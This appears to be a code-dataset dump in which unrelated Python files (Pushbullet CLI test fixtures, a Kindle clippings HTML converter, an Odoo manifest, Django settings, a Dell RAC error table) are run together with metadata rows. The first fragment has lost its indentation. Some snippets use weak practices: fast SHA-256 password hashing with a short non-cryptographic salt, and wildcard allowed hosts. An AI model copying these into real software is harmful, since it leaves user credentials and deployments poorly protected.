runner = CliRunner()
return runner
def wrap_runner_func(runner, func):
def invoke(arg_list=[], should_raise=True, **kwargs):
result = runner.invoke(func, arg_list, **kwargs)
if should_raise:
if result.exception is not None:
raise result.exception
assert result.exit_code == 0
return result
return invoke
@pytest.fixture
def push(runner):
from pushbullet_cli.app import push
return wrap_runner_func(runner, push)
@pytest.fixture
def list_devices(runner):
from pushbullet_cli.app import list_devices
return wrap_runner_func(runner, list_devices)
@pytest.fixture
def list_pushes(runner):
from pushbullet_cli.app import list_pushes
return wrap_runner_func(runner, list_pushes)
@pytest.fixture
def set_key(runner):
from pushbullet_cli.app import set_key
return wrap_runner_func(runner, set_key)
| 21.033333 | 61 | 0.723455 | 172 | 1,262 | 5.081395 | 0.27907 | 0.06865 | 0.097254 | 0.114416 | 0.283753 | 0.224256 | 0.08238 | 0 | 0 | 0 | 0 | 0.000994 | 0.202853 | 1,262 | 59 | 62 | 21.389831 | 0.867793 | 0 | 0 | 0.128205 | 0 | 0 | 0.005547 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 1 | 0.205128 | false | 0 | 0.230769 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0582a1028ca60869856e20d167bdffc0aa95e128 | 412 | py | Python | pal95_doc/docs/__init__.py | MacHu-GWU/pal95_doc-project | 753b865435f316e985320247489e68f465741827 | [
"MIT"
] | 13 | 2019-10-01T02:51:27.000Z | 2022-02-28T17:38:58.000Z | pal95_doc/docs/__init__.py | MacHu-GWU/pal95_doc-project | 753b865435f316e985320247489e68f465741827 | [
"MIT"
] | 2 | 2020-11-09T09:17:21.000Z | 2021-04-27T21:20:59.000Z | pal95_doc/docs/__init__.py | MacHu-GWU/pal95_doc-project | 753b865435f316e985320247489e68f465741827 | [
"MIT"
] | 1 | 2020-02-28T12:05:22.000Z | 2020-02-28T12:05:22.000Z | # -*- coding: utf-8 -*-
from .equipment import lt_equipment
from .spell import lt_spell_lxy, lt_spell_zle, lt_spell_lyr, lt_spell_an
from .monster import lt_monster
from .zone import lt_zone
doc_data = dict(
lt_equipment=lt_equipment,
lt_spell_lxy=lt_spell_lxy,
lt_spell_zle=lt_spell_zle,
lt_spell_lyr=lt_spell_lyr,
lt_spell_an=lt_spell_an,
lt_monster=lt_monster,
lt_zone=lt_zone,
) | 25.75 | 72 | 0.764563 | 72 | 412 | 3.902778 | 0.236111 | 0.298932 | 0.106762 | 0.128114 | 0.384342 | 0.348754 | 0.298932 | 0.298932 | 0 | 0 | 0 | 0.002874 | 0.15534 | 412 | 16 | 73 | 25.75 | 0.804598 | 0.050971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0597da213baf4860aef1103fe9f6eaf312ad6be5 | 9,246 | py | Python | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | [
"MIT"
] | 1 | 2020-05-25T11:30:54.000Z | 2020-05-25T11:30:54.000Z | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | [
"MIT"
] | null | null | null | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | [
"MIT"
] | null | null | null | # coding: utf-8
import re
import datetime
from .feed import read_file
__author__ = "Rafał Karoń <rafalkaron@gmail.com>"
def clipps_str_to_html_str(clipps_str):
"""Return a string that contains the converted \"Kindle Clippings.txt file\" to HTML."""
# ADD ELEMENTS (SVG favicon encoded with: https://yoksel.github.io/url-encoder/)
pre_elements = r"""<!DOCTYPE html>
<html>
<head>
<title>Kindle Clippings</title>
<meta charset="utf-8">
<link href="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8' standalone='no'%3F%3E%3C!-- Created with Inkscape (http://www.inkscape.org/) --%3E%3Csvg xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:cc='http://creativecommons.org/ns%23' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns%23' xmlns:svg='http://www.w3.org/2000/svg' xmlns='http://www.w3.org/2000/svg' xmlns:sodipodi='http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd' xmlns:inkscape='http://www.inkscape.org/namespaces/inkscape' width='1000' height='1000' viewBox='0 0 264.58335 264.58335' version='1.1' id='svg8' inkscape:version='0.92.4 (5da689c313, 2019-01-14)' sodipodi:docname='klipps3.svg' inkscape:export-filename='C:%5CUsers%5Crafal%5CDesktop%5Cklipps3.png' inkscape:export-xdpi='72.000008' inkscape:export-ydpi='72.000008'%3E%3Ctitle id='title3713'%3EKlipps%3C/title%3E%3Cdefs id='defs2' /%3E%3Csodipodi:namedview id='base' pagecolor='%23515151' bordercolor='%23000000' borderopacity='1' inkscape:pageopacity='0.20784314' inkscape:pageshadow='2' inkscape:zoom='0.25' inkscape:cx='30.072603' inkscape:cy='582.33116' inkscape:document-units='px' inkscape:current-layer='layer1' showgrid='false' inkscape:window-width='1842' inkscape:window-height='1057' inkscape:window-x='70' inkscape:window-y='-8' inkscape:window-maximized='1' units='px' inkscape:showpageshadow='false' showborder='true' inkscape:pagecheckerboard='false' showguides='true' inkscape:guide-bbox='true'%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0,1' id='guide3724' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='1,0' id='guide3726' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='79.375005,79.375005' orientation='-0.70710678,0.70710678' id='guide3748' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0.70710678,0.70710678' id='guide3750' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458327,150.45027' orientation='-0.70710678,0.70710678' id='guide3776' inkscape:locked='false' /%3E%3Csodipodi:guide position='150.45027,26.458323' orientation='-0.70710678,0.70710678' id='guide3778' inkscape:locked='false' /%3E%3Csodipodi:guide position='114.13307,238.12501' orientation='0.70710678,0.70710678' id='guide3780' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458335,150.45028' orientation='0.70710678,0.70710678' id='guide3782' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='150.45028,26.458334' orientation='1,0' id='guide3801' inkscape:locked='false' /%3E%3Csodipodi:guide position='238.12501,114.13307' orientation='0,1' id='guide3803' inkscape:locked='false' /%3E%3Csodipodi:guide position='132.29167,114.13307' orientation='-0.70710678,0.70710678' id='guide3806' inkscape:locked='false' /%3E%3Csodipodi:guide position='26.458336,150.45028' orientation='0,1' id='guide3826' inkscape:locked='false' /%3E%3C/sodipodi:namedview%3E%3Cmetadata id='metadata5'%3E%3Crdf:RDF%3E%3Ccc:Work rdf:about=''%3E%3Cdc:format%3Eimage/svg+xml%3C/dc:format%3E%3Cdc:type rdf:resource='http://purl.org/dc/dcmitype/StillImage' /%3E%3Cdc:title%3EKlipps%3C/dc:title%3E%3Cdc:creator%3E%3Ccc:Agent%3E%3Cdc:title%3ERafał Karoń%3C/dc:title%3E%3C/cc:Agent%3E%3C/dc:creator%3E%3C/cc:Work%3E%3C/rdf:RDF%3E%3C/metadata%3E%3Cg inkscape:groupmode='layer' id='layer3' inkscape:label='Background' /%3E%3Cg inkscape:groupmode='layer' id='layer2' inkscape:label='Filling'%3E%3Ccircle style='fill:%23ffffff;stroke-width:0.22826612' id='path3736-9' cx='132.29167' cy='132.29169' r='114.13306' /%3E%3C/g%3E%3Cg inkscape:label='Icon' inkscape:groupmode='layer' id='layer1' transform='translate(0,-32.416632)'%3E%3Cpath style='fill:%23e63946;stroke-width:1.32083833;fill-opacity:1' d='M 431.36914 100 L 100 431.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 431.36914 100 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770' /%3E%3Cpath style='fill:%231d3557;fill-opacity:1;stroke-width:1.32083833' d='M 500 500 L 500 831.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 831.36914 500 L 500 500 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770-4' /%3E%3C/g%3E%3C/svg%3E%0A" rel='icon' type='image/svg'/>
</head>
<body>"""
heading = "<h1>Kindle Clippings</h1>\n<h2>"
footer = f"<footer>Generated on {datetime.datetime.now().strftime('%B %d, %Y')} at {datetime.datetime.now().strftime('%I:%M %p')} with <a target=\"_blank\" href=\"https://github.com/rafalkaron/Klipps\">Klipps</a></footer>"
post_elements = "</body>\n</html>"
html_str = "\n".join((pre_elements, heading, clipps_str, footer, post_elements))
# SEARCH AND REPLACE
html_str = re.sub(r"\n\n", "\n", html_str) # Removes empty lines
html_str = re.sub(r"==========", "<div class=\"entry\">\n<h2>", html_str) # Replaces Kindle entryies markup with the "entry" class and opens headers 2
html_str = re.sub(r"- .* \| ", "###timestamp### ", html_str) # Removes redundant information from timestamps and adds a tag that is used to optimize RE in the next lines
for added_on in re.findall(r"^###timestamp### .*", html_str, re.MULTILINE): # Shortens and wraps timestamps || MAKE THIS GENERIC FOR OTHER LANGUAGES
added_on_new = re.sub(r"###timestamp###", "", added_on) # Removes the ###timestamp### tag
added_on_new = re.sub(r":\d\d$", "", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 24h timestamps
added_on_new = re.sub(r":\d\d PM$", " PM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h PM timestamps
added_on_new = re.sub(r":\d\d AM$", " AM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h AM timestamps
added_on_new = re.sub(r"^ Added on ", "", added_on_new) # [Optional] Removes the "Added on" timestamp text
added_on_new = f"<div class=\"timestamp\">{added_on_new}</div>\n<blockquote>" # Wraps timestamps in timestamp divs and opens a blockquote
html_str = re.sub(added_on, added_on_new, html_str)
html_str = re.sub(r"<div class=\"timestamp\">", "</h2>\n<div class=\"timestamp\">", html_str) # Closes headers 2 before timestamps
html_str = re.sub(r"<div class=\"entry\">\n<h2>\n<footer>", "</blockquote>\n</div>\n<footer>", html_str) # Removes redundant entry divs and headers 2 before the footer
html_str = re.sub("<div class=\"entry\">\n<h2>", "</blockquote>\n</div>\n<div class=\"entry\">\n<h2>", html_str) # Closes blockquote and entry div before opening anothe entry div
html_str = re.sub(r"</h1>\n<h2>", "</h1>\n<div class=\"entry\">\n<h2>", html_str) # Opens the first element div after
return html_str
def default_style_html_str(html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a default embedded CSS style."""
html_str = re.sub("<h1>", "<div class=\"frontpage\"><h1>", html_str)
html_str = re.sub("</h1>", "</h1>\n<div class=\"generator\"><p>Generated with Klipps</p></div>\n</div>", html_str)
html_str = re.sub("/>\n</head>", """/>
<style>
*{
font-family: Helvetica, Arial, sans-serif;
font-size: 100%;
margin: 0px;
}
.frontpage{
background-color: #1D3557;
height: 100vh;
}
h1{
font-size: 10vw;
text-align: center;
padding-top: 15vh;
padding-bottom: 20vh;
padding-left: 1vh;
padding-right: 1vh;
color: #F1FAEE;
}
.generator{
font-size: 3vw;
text-align: center;
color: #F1FAEE;
}
.entry{
padding: 4rem 8vw 4rem 8vw;
}
.entry:nth-child(odd){
background: #F1FAEE;
}
.entry:nth-child(even){
background: rgb(228, 235, 226);
}
h2{
font-size: 2.6rem;
color: #1D3557;
}
.timestamp{
font-size: 1.2rem;
font-weight: bold;
padding-bottom: 1rem;
color: #1D3557;
}
blockquote{
font-size: 1.5rem;
text-align: justify;
color: #1D3557;
}
footer{
font-size: 1.5rem;
padding: 2rem 1rem 2rem 1rem;
background-color: #1D3557;
color: #F1FAEE;
text-align: center;
}
a{
color: #E63946;
font-weight: bolder;
text-decoration: none;
}
</style>
</head>""", html_str)
return html_str
def custom_style_html_str(css_filepath, html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a custom embedded CSS style."""
style = read_file(css_filepath)
html_str = re.sub("/>\n</head>", f"/>\n<style>\n{style}\n</style>\n</head>", html_str)
return html_str | 72.234375 | 4,532 | 0.701709 | 1,429 | 9,246 | 4.482155 | 0.271519 | 0.037158 | 0.018267 | 0.046838 | 0.343169 | 0.314442 | 0.251678 | 0.196565 | 0.186261 | 0.170492 | 0 | 0.130032 | 0.113346 | 9,246 | 128 | 4,533 | 72.234375 | 0.651256 | 0.125784 | 0 | 0.153846 | 0 | 0.019231 | 0.802488 | 0.399502 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028846 | false | 0 | 0.028846 | 0 | 0.086538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
55333cbb250a399b054018a193b9449274e24d7c | 837 | py | Python | website_sale_cache/__manifest__.py | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | 1 | 2020-03-01T03:04:21.000Z | 2020-03-01T03:04:21.000Z | website_sale_cache/__manifest__.py | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | null | null | null | website_sale_cache/__manifest__.py | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | 3 | 2019-07-29T20:23:16.000Z | 2021-01-07T20:51:24.000Z | # Copyright 2017 Artyom Losev
# Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr>
# License MIT (https://opensource.org/licenses/MIT).
{
"name": """E-commerce Category Cache""",
"summary": """Use this module to greatly accelerate the loading of a page with a large number of product categories""",
"category": "Website",
"images": ["images/websale_cache.png"],
"version": "13.0.1.0.1",
"author": "IT-Projects LLC, Artyom Losev",
"support": "apps@itpp.dev",
"website": "https://www.it-projects.info",
"license": "Other OSI approved licence", # MIT
"price": 25.00,
"currency": "EUR",
"depends": ["website_sale", "website", "base_action_rule"],
"data": ["views.xml", "data/ir_action_server.xml", "data/base_action_rules.xml"],
"installable": False,
}
| 41.85 | 123 | 0.658303 | 107 | 837 | 5.074766 | 0.719626 | 0.055249 | 0.051565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025568 | 0.158901 | 837 | 19 | 124 | 44.052632 | 0.745739 | 0.195938 | 0 | 0 | 0 | 0 | 0.681138 | 0.112275 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
554e5d74e0feb6600546ab4240369b860c3f874d | 492 | py | Python | g/appengine/py/standard/simple-blog/app/helpers/hasher.py | chhschou/sandpit | d4a6760905b45b90455f10a5b50af3c5f743e445 | [
"MIT"
] | null | null | null | g/appengine/py/standard/simple-blog/app/helpers/hasher.py | chhschou/sandpit | d4a6760905b45b90455f10a5b50af3c5f743e445 | [
"MIT"
] | null | null | null | g/appengine/py/standard/simple-blog/app/helpers/hasher.py | chhschou/sandpit | d4a6760905b45b90455f10a5b50af3c5f743e445 | [
"MIT"
] | null | null | null | import random
import string
import hashlib
def make_salt():
return ''.join(random.choice(string.letters) for x in xrange(5))
# Implement the function valid_pw() that returns True if a user's password
# matches its hash. You will need to modify make_pw_hash.
def make_pw_hash_with_salt(name, pw, salt):
h = hashlib.sha256(name + pw + salt).hexdigest()
return '%s|%s' % (h, salt)
def make_pw_hash(name, pw):
s = make_salt()
return make_pw_hash_with_salt(name, pw, s)
| 23.428571 | 74 | 0.707317 | 83 | 492 | 4.012048 | 0.506024 | 0.072072 | 0.12012 | 0.078078 | 0.144144 | 0.144144 | 0.144144 | 0 | 0 | 0 | 0 | 0.009926 | 0.180894 | 492 | 20 | 75 | 24.6 | 0.816377 | 0.260163 | 0 | 0 | 0 | 0 | 0.01385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.272727 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
55813ead580a9fd9024544a5265e546eab6feb28 | 3,339 | py | Python | mysite/mysite/settings.py | prnake/search_engine_demo | 57122052f63bbd054e0ca84d3c6832e6ecb00ec8 | [
"MIT"
] | 3 | 2020-08-08T04:44:29.000Z | 2020-09-10T07:38:11.000Z | mysite/mysite/settings.py | prnake/search_engine_demo | 57122052f63bbd054e0ca84d3c6832e6ecb00ec8 | [
"MIT"
] | null | null | null | mysite/mysite/settings.py | prnake/search_engine_demo | 57122052f63bbd054e0ca84d3c6832e6ecb00ec8 | [
"MIT"
] | null | null | null | import os
import environ
env = environ.Env(
# set casting, default value
DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# False if not in os.environ
DEBUG = env('DEBUG')
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
ADMIN_EMAIL = str(env('ADMIN_EMAIL')).split(' ')
ALLOWED_HOSTS = ['*']
SESSION_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"search.apps.SearchConfig",
"scrapy.apps.ScrapyConfig",
'captcha',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
CSRF_COOKIE_SECURE = False
SESSION_COOKIE_SECURE = False
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Captcha
CAPTCHA_IMAGE_SIZE = (80, 28)
CAPTCHA_TIMEOUT = 1
| 24.91791 | 91 | 0.692123 | 364 | 3,339 | 6.203297 | 0.425824 | 0.08636 | 0.052702 | 0.055359 | 0.184234 | 0.147476 | 0.078388 | 0.065545 | 0.03543 | 0 | 0 | 0.008321 | 0.172207 | 3,339 | 133 | 92 | 25.105263 | 0.808611 | 0.210542 | 0 | 0 | 0 | 0 | 0.497706 | 0.414755 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.060241 | 0.024096 | 0 | 0.024096 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
5583a4b67ff425c68e23ee2615524b5aa7a257d1 | 591 | py | Python | meiduo1/apps/meiduo_admin/views/user_group.py | woobrain/nginx-uwsgi-web | 5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae | [
"MIT"
] | null | null | null | meiduo1/apps/meiduo_admin/views/user_group.py | woobrain/nginx-uwsgi-web | 5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae | [
"MIT"
] | 2 | 2021-05-28T19:45:17.000Z | 2021-11-02T15:49:34.000Z | meiduo1/apps/meiduo_admin/views/user_group.py | woobrain/nginx-uwsgi-web | 5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae | [
"MIT"
] | null | null | null | from django.contrib.auth.models import Group, Permission
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from .statistical import UserPagination
from apps.meiduo_admin.serializer.user_group import UserGroupSerializer, GroupPerSerializer
class UserGroupView(ModelViewSet):
serializer_class = UserGroupSerializer
queryset = Group.objects.all()
pagination_class = UserPagination
def simple(self,request):
data = Permission.objects.all()
ser = GroupPerSerializer(data,many=True)
return Response(ser.data) | 32.833333 | 91 | 0.788494 | 64 | 591 | 7.1875 | 0.578125 | 0.034783 | 0.073913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147208 | 591 | 18 | 92 | 32.833333 | 0.912698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.384615 | 0 | 0.846154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
55948a0d8acfcbe1f96f58b36c1bb83505bd04f6 | 175 | py | Python | first_task.py | yashika0607/Task1_python | 4a867227f48f0c8ed9ad418fb412550eef3a7571 | [
"Apache-2.0"
] | null | null | null | first_task.py | yashika0607/Task1_python | 4a867227f48f0c8ed9ad418fb412550eef3a7571 | [
"Apache-2.0"
] | null | null | null | first_task.py | yashika0607/Task1_python | 4a867227f48f0c8ed9ad418fb412550eef3a7571 | [
"Apache-2.0"
] | null | null | null | #task 1
r=float(input("Enter the radius of the circle?\n"))
pi=3.143
area=pi*r*r
print("Area of the circle is ",area)
#task 2
x=input("Enter the file name\n")
print(x+".py")
| 17.5 | 51 | 0.674286 | 38 | 175 | 3.105263 | 0.578947 | 0.169492 | 0.220339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039735 | 0.137143 | 175 | 9 | 52 | 19.444444 | 0.741722 | 0.068571 | 0 | 0 | 0 | 0 | 0.490683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
55a528f7f755e76f01a1fec6c18655befd899209 | 131 | py | Python | Logon.py | fenglihanxiao/multi_test | 46ee84aaa36f1d9594ccf7a14caa167dfcd719d5 | [
"MIT"
] | null | null | null | Logon.py | fenglihanxiao/multi_test | 46ee84aaa36f1d9594ccf7a14caa167dfcd719d5 | [
"MIT"
] | null | null | null | Logon.py | fenglihanxiao/multi_test | 46ee84aaa36f1d9594ccf7a14caa167dfcd719d5 | [
"MIT"
] | null | null | null | num1 = 1
num2 = 20
num3 = 168
# dev first commit
num1 = 1
# resolve conflict
num2 = 88888888
# Test next commit
num3 = 99
| 8.1875 | 18 | 0.641221 | 20 | 131 | 4.2 | 0.75 | 0.119048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247312 | 0.290076 | 131 | 15 | 19 | 8.733333 | 0.655914 | 0.381679 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
55a57c64b93ff64ee4143c416e8510e88ce162fa | 8,022 | py | Python | foulacces.py | Danukeru/FOULACCES | 54304c7a91326f9517c45f6981c4ab8de4eb3964 | [
"BSD-3-Clause"
] | 1 | 2019-10-21T23:43:21.000Z | 2019-10-21T23:43:21.000Z | foulacces.py | Danukeru/FOULACCES | 54304c7a91326f9517c45f6981c4ab8de4eb3964 | [
"BSD-3-Clause"
] | null | null | null | foulacces.py | Danukeru/FOULACCES | 54304c7a91326f9517c45f6981c4ab8de4eb3964 | [
"BSD-3-Clause"
] | 1 | 2019-10-21T23:43:29.000Z | 2019-10-21T23:43:29.000Z | #!/usr/bin/env python
import os
import sys
import hashlib
import httplib
import base64
import socket
from xml.dom.minidom import *
RAC_CODE = { 'x' : 'Unknown error',
'0x0' : 'Success',
'0x4' : 'Number of arguments does not match',
'0xc' : 'Syntax error in xml2cli command',
'0x408' : 'Session Timeout',
'0x43' : 'No such subfunction',
'0x62' : 'Command not supported on this platform for this firmware',
'0xb0002' : 'Invalid handle',
'0x140000' : 'Too many sessions',
'0x140002' : 'Logout',
'0x140004' : 'Invalid password',
'0x140005' : 'Invalid username',
'0x150008' : 'Too many requests',
'0x15000a' : 'No such event',
'0x15000c' : 'No such function',
'0x15000d' : 'Unimplemented',
'0x170003' : 'Missing content in POST ?',
'0x170007' : 'Dont know yet',
'0x1a0004' : 'Invalid sensorname',
'0x10150006' : 'Unknown sensor error',
'0x10150009' : 'Too many sensors in sensorlist',
'0x20308' : 'Console not available',
'0x30003' : 'Console not active',
'0x3000a' : 'Console is in text mode',
'0x3000b' : 'Console is in VGA graphic mode',
'0x30011' : [ 'Console is in Linux mode (no ctrl+alt+del)',
'Console is in Windows or Netware mode' ],
'0xe0003' : 'Unknown serveraction',
'0xf0001' : 'Offset exceeds number of entries in eventlog',
'0xf0003' : 'Request exceeds number of entries in eventlog',
'0xf0004' : 'Invalid number of events requested'
}
SEVERITY = { 'x' : 'Unknown severity. ',
'' : '-',
'0x1' : 'Unknown',
'0x2' : 'OK',
'0x3' : 'Information',
'0x4' : 'Recoverable',
'0x5' : 'Non-Critical',
'0x6' : 'Critical',
'0x7' : 'Non-Recoverable',
}
BOGUS_IDS_1650 = [ '0x1010018', '0x1020010', '0x1020018',
'0x1020062', '0x1030010', '0x1030018',
'0x1030062', '0x1040010', '0x1040018',
'0x1050018', '0x1060010', '0x1060018',
'0x1060062', '0x1070018', '0x1070062',
'0x1080010', '0x1080062', '0x1090010',
'0x10a0010', '0x10f0062', '0x1100010',
'0x1110010', '0x1120010', '0x1120062',
'0x1130010', '0x1140010', '0x1150010',
'0x13b0010', '0x13c0010', '0x13f0010',
'0x14b0010', '0x14d0010', '0x20e0062',
'0x2110062', '0x2160061', '0x2160062',
'0x2170061', '0x2170062', '0x2180061',
'0x2180062', '0x2190061', '0x2190062',
'0x21a0061', '0x21a0062', '0x21b0061',
'0x21b0062', '0x21e0010', '0x21e0061',
'0x21e0062', '0x21f0061', '0x21f0062',
'0x2210010', '0x2220010', '0x2230010',
'0x2240010', '0x2250010', '0x2260010',
'0x2270010', '0x2280010', '0x2290010',
